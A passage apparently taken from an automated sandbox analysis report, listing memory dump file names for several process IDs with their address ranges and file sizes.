                    Filesize

                    3.1MB

                  • memory/5768-613-0x0000000002450000-0x000000000247E000-memory.dmp

                    Filesize

                    184KB

                  • memory/5768-635-0x0000000004B70000-0x0000000004D1A000-memory.dmp

                    Filesize

                    1.7MB

                  • memory/5768-626-0x00000000047E0000-0x00000000047EA000-memory.dmp

                    Filesize

                    40KB

                  • memory/5768-631-0x0000000004880000-0x000000000490C000-memory.dmp

                    Filesize

                    560KB

                  • memory/5800-532-0x0000000007730000-0x0000000007DAA000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/5800-544-0x0000000007410000-0x0000000007418000-memory.dmp

                    Filesize

                    32KB

                  • memory/5800-541-0x0000000007320000-0x000000000732E000-memory.dmp

                    Filesize

                    56KB

                  • memory/5800-537-0x00000000072F0000-0x0000000007301000-memory.dmp

                    Filesize

                    68KB

                  • memory/5800-536-0x0000000007370000-0x0000000007406000-memory.dmp

                    Filesize

                    600KB

                  • memory/5800-534-0x0000000007160000-0x000000000716A000-memory.dmp

                    Filesize

                    40KB

                  • memory/5800-533-0x00000000070F0000-0x000000000710A000-memory.dmp

                    Filesize

                    104KB

                  • memory/5800-543-0x0000000007430000-0x000000000744A000-memory.dmp

                    Filesize

                    104KB

                  • memory/5800-531-0x0000000006FF0000-0x0000000007093000-memory.dmp

                    Filesize

                    652KB

                  • memory/5800-530-0x00000000063B0000-0x00000000063CE000-memory.dmp

                    Filesize

                    120KB

                  • memory/5800-520-0x00000000701B0000-0x00000000701FC000-memory.dmp

                    Filesize

                    304KB

                  • memory/5800-542-0x0000000007330000-0x0000000007344000-memory.dmp

                    Filesize

                    80KB

                  • memory/5800-501-0x0000000004F60000-0x0000000005588000-memory.dmp

                    Filesize

                    6.2MB

                  • memory/5800-519-0x0000000006FB0000-0x0000000006FE2000-memory.dmp

                    Filesize

                    200KB

                  • memory/5800-516-0x0000000005E00000-0x0000000005E4C000-memory.dmp

                    Filesize

                    304KB

                  • memory/5800-515-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

                    Filesize

                    120KB

                  • memory/5800-514-0x00000000057E0000-0x0000000005B34000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/5800-500-0x00000000024B0000-0x00000000024E6000-memory.dmp

                    Filesize

                    216KB

                  • memory/5800-504-0x0000000005770000-0x00000000057D6000-memory.dmp

                    Filesize

                    408KB

                  • memory/5800-503-0x0000000005700000-0x0000000005766000-memory.dmp

                    Filesize

                    408KB

                  • memory/5800-502-0x0000000004E00000-0x0000000004E22000-memory.dmp

                    Filesize

                    136KB

                  • memory/5840-932-0x0000000000390000-0x00000000006AC000-memory.dmp

                    Filesize

                    3.1MB